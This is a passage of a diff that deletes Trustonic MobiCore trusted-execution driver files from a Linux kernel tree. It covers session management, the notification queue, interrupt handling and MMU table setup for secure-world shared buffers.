-- * Legacy and GP TAs close differently:
-- * - GP TAs always send a notification with payload, whether on close or crash
-- * - Legacy TAs only send a notification with payload on crash
-- * - GP TAs may take time to close, and we get -EBUSY back from mcp_cmd
-- * - Legacy TAs always close when asked, unless they are driver in which case
-- *   they just don't close at all
-- */
--int mcp_close_session(struct mcp_session *session)
--{
--	union mcp_message cmd;
--	int ret;
--
--	/* state is either MCP_SESSION_RUNNING or MCP_SESSION_CLOSING_GP */
--	mutex_lock(&mcp_ctx.sessions_lock);
--	if (session->state == MCP_SESSION_RUNNING)
--		session->state = MCP_SESSION_CLOSE_PREPARE;
--
--	mutex_unlock(&mcp_ctx.sessions_lock);
--	/* Signal an eventual waiter that SWd session is going away */
--	complete(&session->completion);
--	/* Send MCP command */
--	memset(&cmd, 0, sizeof(cmd));
--	cmd.cmd_header.cmd_id = MC_MCP_CMD_CLOSE_SESSION;
--	cmd.cmd_close.session_id = session->id;
--	ret = mcp_cmd(&cmd);
--	mutex_lock(&mcp_ctx.sessions_lock);
--	/*
--	 * The GP TA may already have sent its exit code, in which case the
--	 * state has also been changed to MCP_SESSION_CLOSE_NOTIFIED.
--	 */
--	if (!ret) {
--		session->state = MCP_SESSION_CLOSED;
--		list_del(&session->list);
--		mutex_lock(&mcp_ctx.notifications_mutex);
--		list_del(&session->notifications_list);
--		mutex_unlock(&mcp_ctx.notifications_mutex);
--	} else if (ret == -EBUSY) {
--		if (session->state == MCP_SESSION_CLOSE_NOTIFIED)
--			/* GP TA already closed */
--			schedule_work(&session->close_work);
--
--		session->state = MCP_SESSION_CLOSING_GP;
--	} else {
--		/* Something is not right, assume session is still running */
--		session->state = MCP_SESSION_RUNNING;
--	}
--
--	mutex_unlock(&mcp_ctx.sessions_lock);
--	return ret;
--}
--
--int mcp_map(uint32_t session_id, struct mcp_buffer_map *map)
--{
--	union mcp_message cmd;
--	int ret;
--
--	memset(&cmd, 0, sizeof(cmd));
--	cmd.cmd_header.cmd_id = MC_MCP_CMD_MAP;
--	cmd.cmd_map.session_id = session_id;
--	cmd.cmd_map.wsm_type = map->type;
--	cmd.cmd_map.adr_buffer = map->phys_addr;
--	cmd.cmd_map.ofs_buffer = map->offset;
--	cmd.cmd_map.len_buffer = map->length;
--	ret = mcp_cmd(&cmd);
--	if (!ret)
--		map->secure_va = cmd.rsp_map.secure_va;
--
--	return ret;
--}
--
--int mcp_unmap(uint32_t session_id, const struct mcp_buffer_map *map)
--{
--	union mcp_message cmd;
--
--	memset(&cmd, 0, sizeof(cmd));
--	cmd.cmd_header.cmd_id = MC_MCP_CMD_UNMAP;
--	cmd.cmd_unmap.session_id = session_id;
--	cmd.cmd_unmap.wsm_type = map->type;
--	cmd.cmd_unmap.virtual_buffer_len = map->length;
--	cmd.cmd_unmap.secure_va = map->secure_va;
--	return mcp_cmd(&cmd);
--}
--
--int mcp_multimap(uint32_t session_id, struct mcp_buffer_map *maps)
--{
--	struct mcp_buffer_map *map = maps;
--	union mcp_message cmd;
--	struct buffer_map *buf = cmd.cmd_multimap.bufs;
--	int ret = 0;
--	uint32_t i;
--
--	/* Prepare command */
--	memset(&cmd, 0, sizeof(cmd));
--	cmd.cmd_header.cmd_id = MC_MCP_CMD_MULTIMAP;
--	cmd.cmd_multimap.session_id = session_id;
--	for (i = 0; i < MC_MAP_MAX; i++, map++, buf++) {
--		buf->wsm_type = map->type;
--		buf->adr_buffer = map->phys_addr;
--		buf->ofs_buffer = map->offset;
--		buf->len_buffer = map->length;
--	}
--
--	ret = mcp_cmd(&cmd);
--	if (ret)
--		return ret;
--
--	/* Return secure virtual addresses */
--	map = maps;
--	for (i = 0; i < MC_MAP_MAX; i++, map++)
--		map->secure_va = cmd.rsp_multimap.secure_va[i];
--
--	return 0;
--}
--
--int mcp_multiunmap(uint32_t session_id, const struct mcp_buffer_map *maps)
--{
--	const struct mcp_buffer_map *map = maps;
--	union mcp_message cmd;
--	struct buffer_unmap *buf = cmd.cmd_multiunmap.bufs;
--	uint32_t i;
--
--	memset(&cmd, 0, sizeof(cmd));
--	cmd.cmd_header.cmd_id = MC_MCP_CMD_MULTIUNMAP;
--	cmd.cmd_multiunmap.session_id = session_id;
--	for (i = 0; i < MC_MAP_MAX; i++, map++, buf++) {
--		buf->secure_va = map->secure_va;
--		buf->len_buffer = map->length;
--	}
--
--	return mcp_cmd(&cmd);
--}
--
--static int mcp_close(void)
--{
--	union mcp_message cmd;
--
--	memset(&cmd, 0, sizeof(cmd));
--	cmd.cmd_header.cmd_id = MC_MCP_CMD_CLOSE_MCP;
--	return mcp_cmd(&cmd);
--}
--
--static inline bool notif_queue_full(void)
--{
--	struct notification_queue *tx = mcp_ctx.nq.tx;
--
--	return (tx->hdr.write_cnt - tx->hdr.read_cnt) == tx->hdr.queue_size;
--}
--
--static inline void notif_queue_push(uint32_t session_id)
--{
--	struct notification_queue_header *hdr = &mcp_ctx.nq.tx->hdr;
--	uint32_t i = hdr->write_cnt % hdr->queue_size;
--
--	mcp_ctx.nq.tx->notification[i].session_id = session_id;
--	mcp_ctx.nq.tx->notification[i].payload = 0;
--	hdr->write_cnt++;
--}
--
--static inline bool mcp_notifications_flush_nolock(void)
--{
--	bool flushed = false;
--
--	while (!list_empty(&mcp_ctx.notifications) && !notif_queue_full()) {
--		struct mcp_session *session;
--
--		session = list_first_entry(&mcp_ctx.notifications,
--					   struct mcp_session,
--					   notifications_list);
--		dev_dbg(g_ctx.mcd, "pop %x\n", session->id);
--		notif_queue_push(session->id);
--		list_del_init(&session->notifications_list);
--		flushed = true;
--	}
--
--	return flushed;
--}
--
--bool mcp_notifications_flush(void)
--{
--	bool flushed = false;
--
--	mutex_lock(&mcp_ctx.notifications_mutex);
--	flushed = mcp_notifications_flush_nolock();
--	mutex_unlock(&mcp_ctx.notifications_mutex);
--	return flushed;
--}
--
--int mcp_notify(struct mcp_session *session)
--{
--	int ret = 0;
--
--	if (!mcp_ctx.scheduler_cb)
--		return -EAGAIN;
--
--	mutex_lock(&mcp_ctx.notifications_mutex);
--	if (session->id == SID_MCP)
--		dev_dbg(g_ctx.mcd, "notify MCP");
--	else
--		dev_dbg(g_ctx.mcd, "notify %x", session->id);
--
--	/* Notify TEE */
--	if (!list_empty(&mcp_ctx.notifications) || notif_queue_full()) {
--		if (!list_empty(&session->notifications_list)) {
--			ret = -EAGAIN;
--			dev_dbg(g_ctx.mcd, "skip %x\n", session->id);
--		} else {
--			list_add(&session->notifications_list,
--				 &mcp_ctx.notifications);
--			dev_dbg(g_ctx.mcd, "push %x\n", session->id);
--		}
--
--		mcp_notifications_flush_nolock();
--
--		if (mcp_ctx.scheduler_cb(MCP_YIELD)) {
--			MCDRV_ERROR("MC_SMC_N_YIELD failed");
--			ret = -EPROTO;
--		}
--	} else {
--		notif_queue_push(session->id);
--		if (mcp_ctx.scheduler_cb(MCP_NSIQ)) {
--			MCDRV_ERROR("MC_SMC_N_SIQ failed");
--			ret = -EPROTO;
--		}
--	}
--
--	mutex_unlock(&mcp_ctx.notifications_mutex);
--	return ret;
--}
--
--static inline void handle_mcp_notif(uint32_t exit_code)
--{
--	dev_dbg(g_ctx.mcd, "notification from MCP ec %d\n", exit_code);
--	complete(&mcp_ctx.complete);
--}
--
--static inline void handle_session_notif(uint32_t session_id, uint32_t exit_code)
--{
--	struct mcp_session *session = NULL, *s;
--
--	dev_dbg(g_ctx.mcd, "notification from %x ec %d\n", session_id,
--		exit_code);
--	mutex_lock(&mcp_ctx.sessions_lock);
--	list_for_each_entry(s, &mcp_ctx.sessions, list) {
--		if (s->id == session_id) {
--			session = s;
--			break;
--		}
--	}
--
--	if (session) {
--		/* TA has terminated */
--		if (exit_code) {
--			/* Update exit code, or not */
--			mutex_lock(&session->exit_code_lock);
--			/*
--			 * In GP, the only way to recover the sessions exit code
--			 * is to call TEEC_InvokeCommand which will notify. But
--			 * notifying a dead session would change the exit code
--			 * to ERR_SID_NOT_ACTIVE, hence the check below.
--			 */
--			if (!session->is_gp || !session->exit_code ||
--			    (exit_code != ERR_SID_NOT_ACTIVE))
--				session->exit_code = exit_code;
--
--			mutex_unlock(&session->exit_code_lock);
--
--			/* Update state or schedule close worker */
--			if (session->state == MCP_SESSION_CLOSE_PREPARE)
--				session->state = MCP_SESSION_CLOSE_NOTIFIED;
--			else if (session->state == MCP_SESSION_CLOSING_GP)
--				schedule_work(&session->close_work);
--		}
--
--		/* Unblock waiter */
--		complete(&session->completion);
--	}
--	mutex_unlock(&mcp_ctx.sessions_lock);
--
--	/* Unknown session, probably being started */
--	if (!session) {
--		mutex_lock(&mcp_ctx.unexp_notif_mutex);
--		mcp_ctx.unexp_notif.session_id = session_id;
--		mcp_ctx.unexp_notif.payload = exit_code;
--		mutex_unlock(&mcp_ctx.unexp_notif_mutex);
--	}
--}
--
--static void mc_irq_worker(struct work_struct *data)
--{
--	struct notification_queue *rx = mcp_ctx.nq.rx;
--
--	/* Deal with all pending notifications in one go */
--	while ((rx->hdr.write_cnt - rx->hdr.read_cnt) > 0) {
--		struct notification nf;
--
--		nf = rx->notification[rx->hdr.read_cnt++ % rx->hdr.queue_size];
--		if (nf.session_id == SID_MCP)
--			handle_mcp_notif(nf.payload);
--		else
--			handle_session_notif(nf.session_id, nf.payload);
--	}
--
--	/*
--	 * Finished processing notifications. It does not matter whether
--	 * there actually were any notification or not.  S-SIQs can also
--	 * be triggered by an SWd driver which was waiting for a FIQ.
--	 * In this case the S-SIQ tells NWd that SWd is no longer idle
--	 * an will need scheduling again.
--	 */
--	if (mcp_ctx.scheduler_cb)
--		mcp_ctx.scheduler_cb(MCP_NSIQ);
--}
--
--/*
-- * This function represents the interrupt function of the mcDrvModule.
-- * It signals by incrementing of an event counter and the start of the read
-- * waiting queue, the read function a interrupt has occurred.
-- */
--static irqreturn_t irq_handler(int intr, void *arg)
--{
--	/* wake up thread to continue handling this interrupt */
--	schedule_work(&irq_work);
--	return IRQ_HANDLED;
--}
--
--void mcp_register_scheduler(int (*scheduler_cb)(enum mcp_scheduler_commands))
--{
--	mcp_ctx.scheduler_cb = scheduler_cb;
--}
--
--void mcp_register_crashhandler(void (*crashhandler_cb)(void))
--{
--	mcp_ctx.crashhandler_cb = crashhandler_cb;
--}
--
--int mcp_start(void)
--{
--	size_t q_len = ALIGN(2 * (sizeof(struct notification_queue_header) +
--		NQ_NUM_ELEMS * sizeof(struct notification)), 4);
--	int ret;
--
--	/* Make sure we have an interrupt number before going on */
--#if defined(CONFIG_OF)
--	mcp_ctx.irq = irq_of_parse_and_map(g_ctx.mcd->of_node, 0);
--#endif
--#if defined(MC_INTR_SSIQ)
--	if (mcp_ctx.irq <= 0)
--		mcp_ctx.irq = MC_INTR_SSIQ;
--#endif
--
--	if (mcp_ctx.irq <= 0) {
--		MCDRV_ERROR("No IRQ number, aborting");
--		return -EINVAL;
--	}
--
--	/* Call the INIT fastcall to setup shared buffers */
--	ret = mc_fc_init(virt_to_phys(mcp_ctx.base),
--			 (uintptr_t)mcp_ctx.mcp_buffer -
--				(uintptr_t)mcp_ctx.base,
--			 q_len, sizeof(*mcp_ctx.mcp_buffer));
--	if (ret)
--		return ret;
--
--	/* First empty N-SIQ to setup of the MCI structure */
--	ret = mc_fc_nsiq();
--	if (ret)
--		return ret;
--
--	/*
--	 * Wait until <t-base state switches to MC_STATUS_INITIALIZED
--	 * It is assumed that <t-base always switches state at a certain
--	 * point in time.
--	 */
--	do {
--		uint32_t status = 0;
--		uint32_t timeslot;
--
--		ret = mc_fc_info(MC_EXT_INFO_ID_MCI_VERSION, &status, NULL);
--		if (ret)
--			return ret;
--
--		switch (status) {
--		case MC_STATUS_NOT_INITIALIZED:
--			/* Switch to <t-base to give it more CPU time. */
--			ret = EAGAIN;
--			for (timeslot = 0; timeslot < 10; timeslot++) {
--				int tmp_ret = mc_fc_yield();
--
--				if (tmp_ret)
--					return tmp_ret;
--			}
--
--			/* No need to loop like mad */
--			if (ret == EAGAIN)
--				usleep_range(100, 500);
--
--			break;
--		case MC_STATUS_HALT:
--			mcp_dump_mobicore_status();
--			MCDRV_ERROR("halt during init, state 0x%x", status);
--			return -ENODEV;
--		case MC_STATUS_INITIALIZED:
--			MCDRV_DBG("ready");
--			break;
--		default:
--			/* MC_STATUS_BAD_INIT or anything else */
--			MCDRV_ERROR("MCI init failed, state 0x%x", status);
--			return -EIO;
--		}
--	} while (ret == EAGAIN);
--
--	/* Set up S-SIQ interrupt handler */
--	return request_irq(mcp_ctx.irq, irq_handler, IRQF_TRIGGER_RISING,
--			   MC_ADMIN_DEVNODE, NULL);
--}
--
--void mcp_stop(void)
--{
--	mcp_close();
--	mcp_ctx.scheduler_cb = NULL;
--	free_irq(mcp_ctx.irq, NULL);
--	flush_work(&irq_work);
--}
--
--int mcp_init(void)
--{
--	size_t q_len;
--	unsigned long mci;
--
--	mutex_init(&mcp_ctx.buffer_lock);
--	mutex_init(&mcp_ctx.queue_lock);
--	init_completion(&mcp_ctx.complete);
--	/* Setup notification queue mutex */
--	mutex_init(&mcp_ctx.notifications_mutex);
--	INIT_LIST_HEAD(&mcp_ctx.notifications);
--	mcp_session_init(&mcp_ctx.mcp_session, false, NULL);
--	mcp_ctx.mcp_session.id = SID_MCP;
--	mutex_init(&mcp_ctx.unexp_notif_mutex);
--	INIT_LIST_HEAD(&mcp_ctx.sessions);
--	mutex_init(&mcp_ctx.sessions_lock);
--
--	/* NQ_NUM_ELEMS must be power of 2 */
--	q_len = ALIGN(2 * (sizeof(struct notification_queue_header) +
--			   NQ_NUM_ELEMS * sizeof(struct notification)), 4);
--	if (q_len + sizeof(*mcp_ctx.mcp_buffer) > (uint16_t)-1) {
--		MCDRV_DBG_WARN("queues too large (more than 64k), sorry...");
--		return -EINVAL;
--	}
--
--	mcp_ctx.order = get_order(q_len + sizeof(*mcp_ctx.mcp_buffer));
--	mci = __get_free_pages(GFP_USER | __GFP_ZERO, mcp_ctx.order);
--	if (!mci)
--		return -ENOMEM;
--
--	mcp_ctx.nq.tx = (struct notification_queue *)mci;
--	mcp_ctx.nq.tx->hdr.queue_size = NQ_NUM_ELEMS;
--	mci += sizeof(struct notification_queue_header) +
--	    mcp_ctx.nq.tx->hdr.queue_size * sizeof(struct notification);
--
--	mcp_ctx.nq.rx = (struct notification_queue *)mci;
--	mcp_ctx.nq.rx->hdr.queue_size = NQ_NUM_ELEMS;
--	mci += sizeof(struct notification_queue_header) +
--	    mcp_ctx.nq.rx->hdr.queue_size * sizeof(struct notification);
--
--	mcp_ctx.mcp_buffer = (void *)ALIGN(mci, 4);
--	return 0;
--}
--
--void mcp_exit(void)
--{
--	mark_mcp_dead();
--	if (mcp_ctx.dump.off)
--		kfree(mcp_ctx.dump.buf);
--
--	free_pages((unsigned long)mcp_ctx.base, mcp_ctx.order);
--}
-diff --git a/drivers/gud/MobiCoreDriver/mcp.h b/drivers/gud/MobiCoreDriver/mcp.h
-deleted file mode 100644
-index 0eefe573de8bf..0000000000000
---- a/drivers/gud/MobiCoreDriver/mcp.h
-+++ /dev/null
-@@ -1,121 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MC_MCP_H_
--#define _MC_MCP_H_
--
--#include "mci/mcloadformat.h"		/* struct identity */
--
--/* Structure to hold the TA/driver descriptor to pass to MCP */
--struct tbase_object {
--	uint32_t	length;		/* Total length */
--	uint32_t	header_length;	/* Length of header before payload */
--	uint8_t		data[];		/* Header followed by payload */
--};
--
--/* Structure to hold all mapped buffer data to pass to MCP */
--struct mcp_buffer_map {
--	uint64_t	phys_addr;	/** Page-aligned physical address */
--	uint64_t	secure_va;	/** Page-aligned physical address */
--	uint32_t	offset;		/** Data offset inside the first page */
--	uint32_t	length;		/** Length of the data */
--	uint32_t	type;		/** Type of MMU */
--};
--
--struct mcp_session {
--	/* Work descriptor to handle delayed closing, set by upper layer */
--	struct work_struct	close_work;
--	/* Sessions list (protected by mcp sessions_lock) */
--	struct list_head	list;
--	/* Notifications list (protected by mcp notifications_mutex) */
--	struct list_head	notifications_list;
--	/* Notification waiter lock */
--	struct mutex		notif_wait_lock;	/* Only one at a time */
--	/* Notification received */
--	struct completion	completion;
--	/* Notification lock */
--	struct mutex		exit_code_lock;
--	/* Last notification */
--	int32_t			exit_code;
--	/* Session id */
--	uint32_t		id;
--	/* Session state (protected by mcp sessions_lock) */
--	enum mcp_session_state {
--		MCP_SESSION_RUNNING,
--		MCP_SESSION_CLOSE_PREPARE,
--		MCP_SESSION_CLOSE_NOTIFIED,
--		MCP_SESSION_CLOSING_GP,
--		MCP_SESSION_CLOSED,
--	}			state;
--	/* This TA is of Global Platform type, set by upper layer */
--	bool			is_gp;
--	/* GP TAs have login information */
--	struct identity		identity;
--};
--
--/* Init for the mcp_session structure */
--void mcp_session_init(struct mcp_session *session, bool is_gp,
--		      const struct identity *identity);
--int mcp_session_waitnotif(struct mcp_session *session, int32_t timeout);
--int32_t mcp_session_exitcode(struct mcp_session *mcp_session);
--
--/* SWd suspend/resume */
--int mcp_suspend(void);
--int mcp_resume(void);
--bool mcp_suspended(void);
--
--/* Callback to scheduler registration */
--enum mcp_scheduler_commands {
--	MCP_YIELD,
--	MCP_NSIQ,
--};
--
--void mcp_register_scheduler(int (*scheduler_cb)(enum mcp_scheduler_commands));
--bool mcp_notifications_flush(void);
--void mcp_register_crashhandler(void (*crashhandler_cb)(void));
--
--/*
-- * Get the requested SWd sleep timeout value (ms)
-- * - if the timeout is -1, wait indefinitely
-- * - if the timeout is 0, re-schedule immediately (timeouts in µs in the SWd)
-- * - otherwise sleep for the required time
-- * returns true if sleep is required, false otherwise
-- */
--bool mcp_get_idle_timeout(int32_t *timeout);
--void mcp_reset_idle_timeout(void);
--
--/* MCP commands */
--int mcp_get_version(struct mc_version_info *version_info);
--int mcp_load_token(uintptr_t data, const struct mcp_buffer_map *buffer_map);
--int mcp_load_check(const struct tbase_object *obj,
--		   const struct mcp_buffer_map *buffer_map);
--int mcp_open_session(struct mcp_session *session,
--		     const struct tbase_object *obj,
--		     const struct mcp_buffer_map *map,
--		     const struct mcp_buffer_map *tci_map);
--int mcp_close_session(struct mcp_session *session);
--int mcp_map(uint32_t session_id, struct mcp_buffer_map *buffer_map);
--int mcp_unmap(uint32_t session_id, const struct mcp_buffer_map *buffer_map);
--int mcp_multimap(uint32_t session_id, struct mcp_buffer_map *buffer_maps);
--int mcp_multiunmap(uint32_t session_id,
--		   const struct mcp_buffer_map *buffer_maps);
--int mcp_notify(struct mcp_session *mcp_session);
--
--/* MCP initialisation/cleanup */
--int mcp_init(void);
--void mcp_exit(void);
--int mcp_start(void);
--void mcp_stop(void);
--
--#endif /* _MC_MCP_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/mmu.c b/drivers/gud/MobiCoreDriver/mmu.c
-deleted file mode 100644
-index fc769be4d15db..0000000000000
---- a/drivers/gud/MobiCoreDriver/mmu.c
-+++ /dev/null
-@@ -1,450 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include <asm/pgtable.h>
--#include <linux/semaphore.h>
--#include <linux/completion.h>
--#include <linux/mutex.h>
--#include <linux/highmem.h>
--#include <linux/slab.h>
--#include <linux/kthread.h>
--#include <linux/pagemap.h>
--#include <linux/device.h>
--
--#include "public/mc_linux.h"
--
--#include "mci/mcimcp.h"
--
--#include "platform.h"	/* CONFIG_TRUSTONIC_TEE_LPAE */
--#include "main.h"
--#include "debug.h"
--#include "mcp.h"	/* mcp_buffer_map */
--#include "mmu.h"
--
--#ifdef CONFIG_TRUSTONIC_TEE_LPAE
--#define MMU_TYPE_PAGE	(3 << 0)
--#define MMU_BUFFERABLE	BIT(2) /* AttrIndx[0] */
--#define MMU_CACHEABLE	BIT(3) /* AttrIndx[1] */
--#define MMU_NS		BIT(5)
--#define MMU_AP_RW_ALL	BIT(6) /* AP[2:1], RW, at any privilege level */
--#define MMU_EXT_SHARED	(3 << 8) /* SH[1:0], inner shareable */
--#define MMU_EXT_AF	BIT(10) /* Access Flag */
--#define MMU_EXT_NG	BIT(11)
--#define MMU_EXT_XN      (((uint64_t)1) << 54) /* XN */
--#else
--#define MMU_TYPE_EXT	(3 << 0)	/* v5 */
--#define MMU_TYPE_SMALL	(2 << 0)
--#define MMU_BUFFERABLE	BIT(2)
--#define MMU_CACHEABLE	BIT(3)
--#define MMU_EXT_AP0	BIT(4)
--#define MMU_EXT_AP1	(2 << 4)
--#define MMU_EXT_TEX(x)	((x) << 6)	/* v5 */
--#define MMU_EXT_SHARED	BIT(10)	/* v6 */
--#define MMU_EXT_NG	BIT(11)	/* v6 */
--#endif
--
--/*
-- * MobiCore specific page tables for world shared memory.
-- * Linux uses shadow page tables, see arch/arm/include/asm/pgtable-2level.
-- * MobiCore uses the default ARM format.
-- *
-- * Number of page table entries in one L2 MMU table. This is ARM specific, an
-- * MMU table covers 1 MiB by using 256 entries referring to 4KiB pages each.
-- */
--#define L2_ENTRIES_MAX	256
--
--/*
-- * Small buffers (below 1MiB) are mapped using the legacy L2 table, but bigger
-- * buffers now use a fake L1 table that holds 64-bit pointers to L2 tables. As
-- * this must be exactly one page, we can hold up to 512 entries.
-- */
--#define L1_ENTRIES_MAX	512
--
--#ifdef CONFIG_TRUSTONIC_TEE_LPAE
--
--/*
-- * Secure world uses 64-bit physical addresses
-- */
--typedef u64 tbase_pte_t;
--
--/*
-- * Linux uses different mappings for SMP systems(the sharing flag is set for
-- * the pte. In order not to confuse things too much in Mobicore make sure the
-- * shared buffers have the same flags.  This should also be done in SWD side.
-- */
--static tbase_pte_t pte_flags = MMU_BUFFERABLE | MMU_CACHEABLE | MMU_EXT_NG |
--#ifdef CONFIG_SMP
--			       MMU_EXT_SHARED |
--#endif /* CONFIG_SMP */
--			       MMU_EXT_XN | MMU_EXT_AF | MMU_AP_RW_ALL |
--			       MMU_NS | MMU_TYPE_PAGE;
--
--#else /* CONFIG_TRUSTONIC_TEE_LPAE */
--
--/*
-- * Secure world uses 32-bit physical addresses
-- */
--typedef u32 tbase_pte_t;
--
--/*
-- * Linux uses different mappings for SMP systems(the sharing flag is set for
-- * the pte. In order not to confuse things too much in Mobicore make sure the
-- * shared buffers have the same flags.  This should also be done in SWD side.
-- */
--static tbase_pte_t pte_flags = MMU_BUFFERABLE | MMU_CACHEABLE | MMU_EXT_NG |
--#ifdef CONFIG_SMP
--			       MMU_EXT_SHARED | MMU_EXT_TEX(1) |
--#endif /* CONFIG_SMP */
--			       MMU_EXT_AP1 | MMU_EXT_AP0 |
--			       MMU_TYPE_SMALL | MMU_TYPE_EXT;
--
--#endif /* !CONFIG_TRUSTONIC_TEE_LPAE */
--
--/*
-- * Fake L1 MMU table.
-- */
--union l1_table {
--	u64		*pages_phys;	/* Array of physical page addresses */
--	unsigned long	page;
--};
--
--/*
-- * L2 MMU table, which is more a L3 table in the LPAE case.
-- */
--union l2_table {
--	tbase_pte_t	*ptes;		/* Array of PTEs */
--	unsigned long	page;
--};
--
--/*
-- * MMU table allocated to the Daemon or a TLC describing a world shared
-- * buffer.
-- * When users map a malloc()ed area into SWd, a MMU table is allocated.
-- * In addition, the area of maximum 1MB virtual address space is mapped into
-- * the MMU table and a handle for this table is returned to the user.
-- */
--struct tbase_mmu {
--	union l2_table	l2_tables[L1_ENTRIES_MAX];	/* L2 tables */
--	size_t		l2_tables_nr;	/* Actual number of L2 tables */
--	union l1_table	l1_table;	/* Fake L1 table */
--	union l2_table	l1_l2_table;	/* L2 table for the L1 table */
--	uint32_t	offset;
--	uint32_t	length;
--	bool		user;		/* Pages are from user space */
--};
--
--static void free_all_pages(struct tbase_mmu *mmu_table)
--{
--	union l2_table *l2_table = &mmu_table->l2_tables[0];
--	size_t i;
--
--	for (i = 0; i < mmu_table->l2_tables_nr; i++, l2_table++) {
--		if (!l2_table->page)
--			break;
--
--		free_page(l2_table->page);
--	}
--
--	if (mmu_table->l1_l2_table.page)
--		free_page(mmu_table->l1_l2_table.page);
--
--	if (mmu_table->l1_table.page)
--		free_page(mmu_table->l1_table.page);
--}
--
--/*
-- * Create a MMU table for a buffer or trustlet.
-- */
--static inline int map_buffer(struct task_struct *task, const void *data,
--			     unsigned int length, struct tbase_mmu *mmu_table)
--{
--	const void      *reader = (const void *)((uintptr_t)data & PAGE_MASK);
--	struct page	**pages;	/* Same as above, conveniently typed */
--	unsigned long	pages_page;	/* Page to contain the page pointers */
--	size_t		chunk;
--	unsigned long	total_pages_nr;
--	int		l1_entries_max;
--	int		ret = 0;
--
--	/* Check that we have enough space to map data */
--	mmu_table->length = length;
--	mmu_table->offset = (uintptr_t)data & ~PAGE_MASK;
--	total_pages_nr = PAGE_ALIGN(mmu_table->offset + length) / PAGE_SIZE;
--	if (g_ctx.f_mem_ext)
--		l1_entries_max = L1_ENTRIES_MAX;
--	 else
--		l1_entries_max = 1;
--
--	if (total_pages_nr > (l1_entries_max * L2_ENTRIES_MAX)) {
--		dev_err(g_ctx.mcd, "data mapping exceeds %d pages",
--			l1_entries_max * L2_ENTRIES_MAX);
--		return -EINVAL;
--	}
--
--	/* Get number of L2 tables needed */
--	mmu_table->l2_tables_nr = (total_pages_nr + L2_ENTRIES_MAX - 1) /
--				  L2_ENTRIES_MAX;
--	dev_dbg(g_ctx.mcd, "total_pages_nr %lu l2_tables_nr %zu",
--		total_pages_nr, mmu_table->l2_tables_nr);
--
--	/* Get a page to store page pointers */
--	pages_page = get_zeroed_page(GFP_KERNEL);
--	if (!pages_page)
--		return -ENOMEM;
--
--	pages = (struct page **)pages_page;
--
--	/* Allocate a page for the L1 table */
--	if (mmu_table->l2_tables_nr > 1) {
--		tbase_pte_t *pte;
--
--		mmu_table->l1_table.page = get_zeroed_page(GFP_KERNEL);
--		mmu_table->l1_l2_table.page = get_zeroed_page(GFP_KERNEL);
--		if (!mmu_table->l1_table.page || !mmu_table->l1_l2_table.page) {
--			ret = -ENOMEM;
--			goto end;
--		}
--
--		/* Map it */
--		pte = &mmu_table->l1_l2_table.ptes[0];
--		*pte = virt_to_phys(mmu_table->l1_table.pages_phys);
--		*pte |= pte_flags;
--	}
--
--	for (chunk = 0; chunk < mmu_table->l2_tables_nr; chunk++) {
--		unsigned long pages_nr, i;
--		tbase_pte_t *pte;
--		struct page **page_ptr;
--
--		/* Size to map for this chunk */
--		if (chunk == (mmu_table->l2_tables_nr - 1))
--			pages_nr = ((total_pages_nr - 1) % L2_ENTRIES_MAX) + 1;
--		else
--			pages_nr = L2_ENTRIES_MAX;
--
--		/* Allocate a page for the MMU descriptor */
--		mmu_table->l2_tables[chunk].page = get_zeroed_page(GFP_KERNEL);
--		if (!mmu_table->l2_tables[chunk].page) {
--			ret = -ENOMEM;
--			goto end;
--		}
--
--		/* Add page address to L1 table if needed */
--		if (mmu_table->l1_table.page)
--			mmu_table->l1_table.pages_phys[chunk] =
--				virt_to_phys(mmu_table->l2_tables[chunk].ptes);
--
--		/* Get pages */
--		if (task) {
--			long gup_ret;
--
--			/* Buffer was allocated in user space */
--			down_read(&task->mm->mmap_sem);
--			gup_ret = get_user_pages(task, task->mm,
--						 (uintptr_t)reader, pages_nr,
--						 1, 0, pages, 0);
--			reader += pages_nr * PAGE_SIZE;
--			up_read(&task->mm->mmap_sem);
--			if (gup_ret < 0) {
--				ret = gup_ret;
--				dev_err(g_ctx.mcd,
--					"failed to get user pages: %d", ret);
--				goto end;
--			}
--
--			/* check if we could lock all pages. */
--			if (gup_ret != pages_nr) {
--				dev_err(g_ctx.mcd,
--					"get_user_pages() failed, ret: %ld",
--					gup_ret);
--				release_pages(pages, gup_ret, 0);
--				ret = -ENOMEM;
--				goto end;
--			}
--
--			mmu_table->user = true;
--		} else if (is_vmalloc_addr(data)) {
--			/* Buffer vmalloc'ed in kernel space */
--			page_ptr = &pages[0];
--			for (i = 0; i < pages_nr; i++) {
--				struct page *page = vmalloc_to_page(reader);
--
--				if (!page) {
--					dev_err(g_ctx.mcd,
--						"failed to map address");
--					ret = -EINVAL;
--					goto end;
--				}
--
--				*page_ptr++ = page;
--				reader += PAGE_SIZE;
--			}
--		} else {
--			/* Buffer kmalloc'ed in kernel space */
--			struct page *page = virt_to_page(reader);
--
--			reader += pages_nr * PAGE_SIZE;
--			page_ptr = &pages[0];
--			for (i = 0; i < pages_nr; i++)
--				*page_ptr++ = page++;
--		}
--
--		/* Create MMU Table entries */
--		page_ptr = &pages[0];
--		pte = &mmu_table->l2_tables[chunk].ptes[0];
--		for (i = 0; i < pages_nr; i++, page_ptr++, pte++) {
--			/*
--			* Create MMU table entry, see ARM MMU docu for details
--			* about flags stored in the lowest 12 bits.  As a side
--			* reference, the Article "ARM's multiply-mapped memory
--			* mess" found in the collection at
--			* http://lwn.net/Articles/409032/ is also worth reading.
--			*/
--			unsigned long phys = page_to_phys(*page_ptr);
--#if defined CONFIG_ARM64 && !defined CONFIG_TRUSTONIC_TEE_LPAE
--			if (phys & 0xffffffff00000000) {
--				dev_err(g_ctx.mcd,
